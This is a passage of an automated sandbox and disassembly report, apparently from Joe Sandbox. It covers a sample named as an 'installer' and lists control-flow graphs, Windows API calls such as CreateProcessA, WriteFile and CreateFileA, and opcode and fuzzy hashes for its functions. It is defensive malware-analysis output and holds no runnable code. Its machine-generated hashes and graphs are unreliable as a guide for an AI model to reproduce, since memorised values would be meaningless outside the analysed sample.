                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: ;T55
                            • API String ID: 0-2572755013
                            • Opcode ID: 8958540c19bac4381f6eee4b3c03ab74f366ef33e3bff7a4abfadbef642e1020
                            • Instruction ID: b4fb4e2a9d1fc7c9f0f14a69c8c5f5a2f3a36f543bb7167ae03e0235fd72cfb4
                            • Opcode Fuzzy Hash: 8958540c19bac4381f6eee4b3c03ab74f366ef33e3bff7a4abfadbef642e1020
                            • Instruction Fuzzy Hash: B403B332644B018FC728CF28C8D0695B7F3EFD53247598E6DC0AA4B6A5DB78B54ACB50

                            Control-flow Graph
                            control_flow_graph 4469 6c0f86e0-6c0f8767 CreateProcessA 4470 6c0f878b-6c0f8794 4469->4470 4471 6c0f8796-6c0f879b 4470->4471 4472 6c0f87b0-6c0f87fa WaitForSingleObject CloseHandle * 2 4470->4472 4473 6c0f879d-6c0f87a2 4471->4473 4474 6c0f8770-6c0f8783 4471->4474 4472->4470 4473->4470 4475 6c0f87a4-6c0f8807 4473->4475 4474->4470
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: CloseHandle$CreateObjectProcessSingleWait
                            • String ID: D
                            • API String ID: 2059082233-2746444292
                            • Opcode ID: ecf5a498d7c0c87b24bc92acf62352ea5526dd5ebb2bb9df3c716a677b73656b
                            • Instruction ID: ff895f80bf8e19facb5373f2b01a89ce1d0a7c3b11409773fe55f4ce94b8170a
                            • Opcode Fuzzy Hash: ecf5a498d7c0c87b24bc92acf62352ea5526dd5ebb2bb9df3c716a677b73656b
                            • Instruction Fuzzy Hash: 8931C1718193808FD740DF29D18875ABBF0AB9A318F505A1EF8E996360D774D5C5CB83

                            Control-flow Graph
                            control_flow_graph 4477 6c10f34e-6c10f36a 4478 6c10f370-6c10f372 4477->4478 4479 6c10f529 4477->4479 4480 6c10f394-6c10f3b5 4478->4480 4481 6c10f374-6c10f387 call 6c1030cf call 6c1030bc call 6c103810 4478->4481 4482 6c10f52b-6c10f52f 4479->4482 4483 6c10f3b7-6c10f3ba 4480->4483 4484 6c10f3bc-6c10f3c2 4480->4484 4499 6c10f38c-6c10f38f 4481->4499 4483->4484 4486 6c10f3c4-6c10f3c9 4483->4486 4484->4481 4484->4486 4488 6c10f3da-6c10f3eb call 6c10f530 4486->4488 4489 6c10f3cb-6c10f3d7 call 6c10e359 4486->4489 4497 6c10f42c-6c10f43e 4488->4497 4498 6c10f3ed-6c10f3ef 4488->4498 4489->4488 4500 6c10f440-6c10f449 4497->4500 4501 6c10f485-6c10f4a7 WriteFile 4497->4501 4502 6c10f3f1-6c10f3f9 4498->4502 4503 6c10f416-6c10f422 call 6c10f5a1 4498->4503 4499->4482 4507 6c10f475-6c10f483 call 6c10f9b3 4500->4507 4508 6c10f44b-6c10f44e 4500->4508 4504 6c10f4b2 4501->4504 4505 6c10f4a9-6c10f4af GetLastError 4501->4505 4509 6c10f4bb-6c10f4be 4502->4509 4510 6c10f3ff-6c10f40c call 6c10f94b 4502->4510 4511 6c10f427-6c10f42a 4503->4511 4512 6c10f4b5-6c10f4ba 4504->4512 4505->4504 4507->4511 4514 6c10f450-6c10f453 4508->4514 4515 6c10f465-6c10f473 call 6c10fb77 4508->4515 4513 6c10f4c1-6c10f4c6 4509->4513 4518 6c10f40f-6c10f411 4510->4518 4511->4518 4512->4509 4519 6c10f524-6c10f527 4513->4519 4520 6c10f4c8-6c10f4cd 4513->4520 4514->4513 4521 6c10f455-6c10f463 call 6c10fa8e 4514->4521 4515->4511 4518->4512 4519->4482 4525 6c10f4f9-6c10f505 4520->4525 4526 6c10f4cf-6c10f4d4 4520->4526 4521->4511 4529 6c10f507-6c10f50a 4525->4529 4530 6c10f50c-6c10f51f call 6c1030bc call 6c1030cf 4525->4530 4531 6c10f4d6-6c10f4e8 call 6c1030bc call 6c1030cf 4526->4531 4532 6c10f4ed-6c10f4f4 call 6c1030e2 4526->4532 4529->4479 4529->4530 4530->4499 4531->4499 4532->4499
                            APIs
                              • Part of subcall function 6C10F5A1: GetConsoleCP.KERNEL32(?,6C10E7C0,?), ref: 6C10F5E9
                            • WriteFile.KERNEL32(?,?,6C117DDC,00000000,00000000,?,00000000,00000000,6C1191A6,00000000,00000000,?,00000000,6C10E7C0,6C117DDC,00000000), ref: 6C10F49F
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C117DDC,6C10E7C0,00000000,?,?,?,?,00000000,?), ref: 6C10F4A9
                            • __dosmaperr.LIBCMT ref: 6C10F4EE
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: ConsoleErrorFileLastWrite__dosmaperr
                            • String ID: 8Q
                            • API String ID: 251514795-4022487301
                            • Opcode ID: 16fe2a92ef330bde504979592888da5c7b2c40bbba89c67e14d7dc1d8a84db31
                            • Instruction ID: 59f39b07a0643d32e326c7273edf1d5e33010bcb9d337eb01e5bb339bcf3f4b8
                            • Opcode Fuzzy Hash: 16fe2a92ef330bde504979592888da5c7b2c40bbba89c67e14d7dc1d8a84db31
                            • Instruction Fuzzy Hash: 6451D671B0120AABEB00CFA4C842BDE7BB9EF0A318F144555E920ABA51DF74D945C769

                            Control-flow Graph
                            control_flow_graph 4544 6c0f9280-6c0f928c 4545 6c0f928e-6c0f9299 4544->4545 4546 6c0f92cd 4544->4546 4548 6c0f92af-6c0f92bc call 6bfc01f0 call 6c104208 4545->4548 4549 6c0f929b-6c0f92ad 4545->4549 4547 6c0f92cf-6c0f9347 4546->4547 4550 6c0f9349-6c0f9371 4547->4550 4551 6c0f9373-6c0f9379 4547->4551 4557 6c0f92c1-6c0f92cb 4548->4557 4549->4548 4550->4551 4554 6c0f937a-6c0f9439 call 6bfc2250 call 6bfc2340 call 6c0fca69 call 6bfbe010 call 6c0fa778 4550->4554 4557->4547
                            APIs
                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C0F9421
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: Ios_base_dtorstd::ios_base::_
                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                            • API String ID: 323602529-1866435925
                            • Opcode ID: d42b2f0751b5ffeb52a113cc2d875ff5d89ff945a6f245f1e28e92de72ff9eeb
                            • Instruction ID: 97e57a01bb4450c2ffd2ac5c79a160a4904f5666417eaecfc4c3420687e204b0
                            • Opcode Fuzzy Hash: d42b2f0751b5ffeb52a113cc2d875ff5d89ff945a6f245f1e28e92de72ff9eeb
                            • Instruction Fuzzy Hash: 9A5134B5A00B008FD725CF29C485B97BBF1FB49318F408A2DD89647B90D779B94ACB90

                            Control-flow Graph
                            control_flow_graph 4567 6c0ccea0-6c0ccf03 call 6c0fa260 4570 6c0ccf40-6c0ccf49 4567->4570 4571 6c0ccf4b-6c0ccf50 4570->4571 4572 6c0ccf90-6c0ccf95 4570->4572 4573 6c0ccf56-6c0ccf5b 4571->4573 4574 6c0cd000-6c0cd005 4571->4574 4575 6c0ccf9b-6c0ccfa0 4572->4575 4576 6c0cd030-6c0cd035 4572->4576 4581 6c0cd065-6c0cd08c 4573->4581 4582 6c0ccf61-6c0ccf66 4573->4582 4577 6c0cd00b-6c0cd010 4574->4577 4578 6c0cd125-6c0cd158 call 6c0fea90 4574->4578 4583 6c0ccf05-6c0ccf21 WriteFile 4575->4583 4584 6c0ccfa6-6c0ccfab 4575->4584 4579 6c0cd17d-6c0cd191 4576->4579 4580 6c0cd03b-6c0cd040 4576->4580 4586 6c0cd15d-6c0cd175 4577->4586 4587 6c0cd016-6c0cd01b 4577->4587 4578->4570 4596 6c0cd195-6c0cd1a2 4579->4596 4588 6c0cd046-6c0cd060 4580->4588 4589 6c0cd1a7-6c0cd1ac 4580->4589 4592 6c0ccf33-6c0ccf38 4581->4592 4590 6c0ccf6c-6c0ccf71 4582->4590 4591 6c0cd091-6c0cd0aa WriteFile 4582->4591 4585 6c0ccf30 4583->4585 4594 6c0cd0af-6c0cd120 WriteFile 4584->4594 4595 6c0ccfb1-6c0ccfb6 4584->4595 4585->4592 4586->4579 4587->4570 4598 6c0cd021-6c0cd02b 4587->4598 4588->4596 4589->4570 4597 6c0cd1b2-6c0cd1c0 4589->4597 4590->4570 4599 6c0ccf73-6c0ccf86 4590->4599 4591->4585 4592->4570 4594->4585 4595->4570 4601 6c0ccfb8-6c0ccfee call 6c0ff010 ReadFile 4595->4601 4596->4570 4598->4585 4599->4592 4601->4585
                            APIs
                            • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6C0CCFE1
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: FileRead
                            • String ID:
                            • API String ID: 2738559852-0
                            • Opcode ID: 5e587585f60da44735f15efb681ea5f4a19bbadb30eac545da832cb9db970a4b
                            • Instruction ID: 136ee7061a8c4dc59d3c2600e679f337d2460cd1de3cb6640d441a516eddce44
                            • Opcode Fuzzy Hash: 5e587585f60da44735f15efb681ea5f4a19bbadb30eac545da832cb9db970a4b
                            • Instruction Fuzzy Hash: 8C7137B0249340AFD710DF28C884B9EBBF4BF89708F50492EF494C66A0E375D9858B83

                            Control-flow Graph
                            control_flow_graph 4626 6c0cc390-6c0cc406 call 6c0fa260 call 6c0ff010 4631 6c0cc426-6c0cc42f 4626->4631 4632 6c0cc490-6c0cc495 4631->4632 4633 6c0cc431-6c0cc436 4631->4633 4634 6c0cc49b-6c0cc4a0 4632->4634 4635 6c0cc570-6c0cc575 4632->4635 4636 6c0cc43c-6c0cc441 4633->4636 4637 6c0cc500-6c0cc505 4633->4637 4638 6c0cc638-6c0cc63d 4634->4638 4639 6c0cc4a6-6c0cc4ab 4634->4639 4640 6c0cc57b-6c0cc580 4635->4640 4641 6c0cc6d6-6c0cc6db 4635->4641 4642 6c0cc5bf-6c0cc5c4 4636->4642 4643 6c0cc447-6c0cc44c 4636->4643 4644 6c0cc679-6c0cc67e 4637->4644 4645 6c0cc50b-6c0cc510 4637->4645 4658 6c0cc8ab-6c0cc8b0 4638->4658 4659 6c0cc643-6c0cc648 4638->4659 4648 6c0cc796-6c0cc79b 4639->4648 4649 6c0cc4b1-6c0cc4b6 4639->4649 4650 6c0cc586-6c0cc58b 4640->4650 4651 6c0cc830-6c0cc835 4640->4651 4652 6c0cc6e1-6c0cc6e6 4641->4652 4653 6c0cc912-6c0cc917 4641->4653 4654 6c0cc5ca-6c0cc5cf 4642->4654 4655 6c0cc863-6c0cc868 4642->4655 4656 6c0cc742-6c0cc747 4643->4656 4657 6c0cc452-6c0cc457 4643->4657 4646 6c0cc684-6c0cc689 4644->4646 4647 6c0cc8e2-6c0cc8e7 4644->4647 4660 6c0cc7de-6c0cc7e3 4645->4660 4661 6c0cc516-6c0cc51b 4645->4661 4666 6c0cc68f-6c0cc694 4646->4666 4667 6c0ccb61-6c0ccb85 4646->4667 4664 6c0cc8ed-6c0cc8f2 4647->4664 4665 6c0ccdf9-6c0cce12 4647->4665 4678 6c0cc408-6c0cc418 4648->4678 4679 6c0cc7a1-6c0cc7a6 4648->4679 4668 6c0cc4bc-6c0cc4c1 4649->4668 4669 6c0cc97a-6c0cc984 4649->4669 4680 6c0cc9fe-6c0cca3a 4650->4680 4681 6c0cc591-6c0cc596 4650->4681 4684 6c0ccd6c-6c0ccd88 4651->4684 4685 6c0cc83b-6c0cc840 4651->4685 4672 6c0cc6ec-6c0cc6f1 4652->4672 4673 6c0ccc12-6c0ccc4d call 6c0ff010 call 6c0cb4d0 4652->4673 4670 6c0cc91d-6c0cc922 4653->4670 4671 6c0cce1a-6c0cce29 4653->4671 4686 6c0cc5d5-6c0cc5da 4654->4686 4687 6c0cca71-6c0cca9b call 6c0fea90 4654->4687 4688 6c0cc86e-6c0cc873 4655->4688 4689 6c0ccdb7-6c0ccdbf 4655->4689 4674 6c0cc74d-6c0cc752 4656->4674 4675 6c0ccca3-6c0cccba 4656->4675 4690 6c0cc93d-6c0cc95b 4657->4690 4691 6c0cc45d-6c0cc462 4657->4691 4662 6c0ccdda-6c0ccdf1 4658->4662 4663 6c0cc8b6-6c0cc8bb 4658->4663 4692 6c0cc64e-6c0cc653 4659->4692 4693 6c0ccb08-6c0ccb34 4659->4693 4682 6c0cc7e9-6c0cc7ee 4660->4682 4683 6c0cccfa-6c0ccd23 4660->4683 4676 6c0cc521-6c0cc526 4661->4676 4677 6c0cc9a3-6c0cc9b3 4661->4677 4662->4665 4663->4631 4716 6c0cc8c1-6c0cc8dd 4663->4716 4664->4631 4717 6c0cc8f8-6c0cc90d 4664->4717 4665->4671 4696 6c0ccb8a-6c0ccc0d 4666->4696 4697 6c0cc69a-6c0cc69f 4666->4697 4667->4631 4718 6c0cc989-6c0cc99e 4668->4718 4719 6c0cc4c7-6c0cc4cc 4668->4719 4669->4631 4670->4631 4720 6c0cc928-6c0cc938 4670->4720 4713 6c0cce31-6c0cce36 4671->4713 4699 6c0ccc77-6c0ccc88 4672->4699 4700 6c0cc6f7-6c0cc6fc 4672->4700 4751 6c0ccc52-6c0ccc72 4673->4751 4702 6c0cc758-6c0cc75d 4674->4702 4703 6c0cccc9-6c0cccd8 4674->4703 4698 6c0cccbc-6c0cccc4 4675->4698 4721 6c0cc52c-6c0cc531 4676->4721 4722 6c0cc9bd-6c0cc9c5 4676->4722 4677->4722 4709 6c0cc41d 4678->4709 4705 6c0cc7ac-6c0cc7b1 4679->4705 4706 6c0ccce0-6c0cccf5 4679->4706 4725 6c0cca43-6c0cca6c 4680->4725 4724 6c0cc59c-6c0cc5a1 4681->4724 4681->4725 4707 6c0ccd28-6c0ccd67 4682->4707 4708 6c0cc7f4-6c0cc7f9 4682->4708 4683->4631 4701 6c0ccd8a-6c0ccd98 4684->4701 4710 6c0ccd9d-6c0ccdad 4685->4710 4711 6c0cc846-6c0cc84b 4685->4711 4726 6c0ccaa0-6c0ccb03 call 6c0cce50 CreateFileA 4686->4726 4727 6c0cc5e0-6c0cc5e5 4686->4727 4687->4631 4712 6c0cc879-6c0cc8a6 4688->4712 4688->4713 4704 6c0ccdc4-6c0ccdd5 4689->4704 4690->4701 4714 6c0cc468-6c0cc46d 4691->4714 4715 6c0cc960-6c0cc975 4691->4715 4694 6c0ccb39-6c0ccb5c 4692->4694 4695 6c0cc659-6c0cc65e 4692->4695 4693->4631 4694->4631 4695->4631 4729 6c0cc664-6c0cc674 4695->4729 4696->4631 4697->4631 4731 6c0cc6a5-6c0cc6d1 4697->4731 4698->4631 4730 6c0ccc8d-6c0ccc9e 4699->4730 4700->4631 4732 6c0cc702-6c0cc73d 4700->4732 4701->4631 4702->4631 4733 6c0cc763-6c0cc791 4702->4733 4703->4706 4704->4631 4705->4631 4734 6c0cc7b7-6c0cc7d9 4705->4734 4706->4709 4707->4631 4708->4631 4735 6c0cc7ff-6c0cc82b 4708->4735 4736 6c0cc420-6c0cc424 4709->4736 4710->4689 4711->4631 4738 6c0cc851-6c0cc85e 4711->4738 4712->4631 4713->4631 4737 6c0cce3c-6c0cce47 4713->4737 4714->4631 4739 6c0cc46f-6c0cc483 4714->4739 4715->4631 4716->4730 4717->4631 4718->4736 4719->4631 4740 6c0cc4d2-6c0cc4fa call 6c0c2a20 call 6c0c2a30 4719->4740 4720->4704 4721->4631 4742 6c0cc537-6c0cc561 4721->4742 4741 6c0cc9ca-6c0cc9f9 4722->4741 4724->4631 4744 6c0cc5a7-6c0cc5ba 4724->4744 4725->4631 4726->4631 4727->4631 4746 6c0cc5eb-6c0cc633 4727->4746 4729->4741 4730->4631 4731->4631 4732->4631 4733->4698 4734->4701 4735->4631 4736->4631 4738->4741 4739->4704 4740->4631 4741->4631 4742->4631 4744->4631 4746->4631 4751->4631
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: @*Z$@*Z
                            • API String ID: 0-2842812045
                            • Opcode ID: 1aeb28f609ce04d60525318ae7e6c8bf2e954f3e8f5c2bd6119799e3c2bda447
                            • Instruction ID: 3786698b55fdc35a7e0518e053a4de277dcf2f7d0610e667cf334f1fd72dc557
                            • Opcode Fuzzy Hash: 1aeb28f609ce04d60525318ae7e6c8bf2e954f3e8f5c2bd6119799e3c2bda447
                            • Instruction Fuzzy Hash: EB4266706093428FCB14DF28C49166EBBE1AB89308F648D6EF49AC7762D335D985CB43

                            Control-flow Graph
                            control_flow_graph 4755 6c10f015-6c10f029 call 6c114c92 4758 6c10f02b-6c10f02d 4755->4758 4759 6c10f02f-6c10f037 4755->4759 4760 6c10f07d-6c10f09d call 6c114e0f 4758->4760 4761 6c10f042-6c10f045 4759->4761 4762 6c10f039-6c10f040 4759->4762 4771 6c10f0ab 4760->4771 4772 6c10f09f-6c10f0a9 call 6c1030e2 4760->4772 4765 6c10f063-6c10f073 call 6c114c92 CloseHandle 4761->4765 4766 6c10f047-6c10f04b 4761->4766 4762->4761 4764 6c10f04d-6c10f061 call 6c114c92 * 2 4762->4764 4764->4758 4764->4765 4765->4758 4774 6c10f075-6c10f07b GetLastError 4765->4774 4766->4764 4766->4765 4776 6c10f0ad-6c10f0b0 4771->4776 4772->4776 4774->4760
                            APIs
                            • CloseHandle.KERNEL32(00000000,?,00000000,?,6C11794F), ref: 6C10F06B
                            • GetLastError.KERNEL32(?,00000000,?,6C11794F), ref: 6C10F075
                            • __dosmaperr.LIBCMT ref: 6C10F0A0
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: CloseErrorHandleLast__dosmaperr
                            • String ID:
                            • API String ID: 2583163307-0
                            • Opcode ID: 391754e8fdcd68bb36aa4875df5659078a34cb8fd036f82c59d21af8295c6a6f
                            • Instruction ID: a0f5e577ddc09dd06d91e641700790c6ff204cc89961f16a718278dd2724dd34
                            • Opcode Fuzzy Hash: 391754e8fdcd68bb36aa4875df5659078a34cb8fd036f82c59d21af8295c6a6f
                            • Instruction Fuzzy Hash: AC014E3770A2202BD6101239D8467AE376B4BC3B3CF398759E93487FC5EF69D4848294

                            Control-flow Graph
                            control_flow_graph 5000 6c10428c-6c104297 5001 6c104299-6c1042ac call 6c1030bc call 6c103810 5000->5001 5002 6c1042ae-6c1042bb 5000->5002 5013 6c104300-6c104302 5001->5013 5004 6c1042f6-6c1042ff call 6c10e565 5002->5004 5005 6c1042bd-6c1042d2 call 6c1043a9 call 6c10be2e call 6c10d350 call 6c10ef88 5002->5005 5004->5013 5019 6c1042d7-6c1042dc 5005->5019 5020 6c1042e3-6c1042e7 5019->5020 5021 6c1042de-6c1042e1 5019->5021 5020->5004 5022 6c1042e9-6c1042f5 call 6c107eab 5020->5022 5021->5004 5022->5004
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: 8Q
                            • API String ID: 0-4022487301
                            • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                            • Instruction ID: 8350f028c35655e5fc2ffe01cee6c4dc7a4e68c9297417a68520cdbce8c8fc44
                            • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                            • Instruction Fuzzy Hash: 1FF02832B016205AD6315A3AAC40BCB33A88F6237CF514B29E92097EC0DF34D50B86E1
                            APIs
                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C0F91A4
                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C0F91E4
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: Ios_base_dtorstd::ios_base::_
                            • String ID:
                            • API String ID: 323602529-0
                            • Opcode ID: 24a16ad9f4365bf589f853616afcb37af3b8da0a8eba193683946e7e29bdbaa4
                            • Instruction ID: cb56feea906fd1d14e433c1bf5ec657bf3ef869b1b7495f6cd4a5b79f82efdd0
                            • Opcode Fuzzy Hash: 24a16ad9f4365bf589f853616afcb37af3b8da0a8eba193683946e7e29bdbaa4
                            • Instruction Fuzzy Hash: 41515971101B00DBD725CF25C895BE7BBF4FB05718F448A2CE8AA47AA1DB35B589CB80
                            APIs
                            • GetLastError.KERNEL32(6C129DD0,0000000C), ref: 6C102642
                            • ExitThread.KERNEL32 ref: 6C102649
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: ErrorExitLastThread
                            • String ID:
                            • API String ID: 1611280651-0
                            • Opcode ID: fa82292a6aa0e36ee9e51b90252213097788ab094063836d5daa1bf828fc0a39
                            • Instruction ID: 0df37ed0981ba17d129014a94ae4433ed5a1e651b3880301bdaf8d0368986c4e
                            • Opcode Fuzzy Hash: fa82292a6aa0e36ee9e51b90252213097788ab094063836d5daa1bf828fc0a39
                            • Instruction Fuzzy Hash: 30F0C275B00204AFDB00AFB0C84DBAE7B74FF45214F140549E40197B91DF35A985DFA1
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                             • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
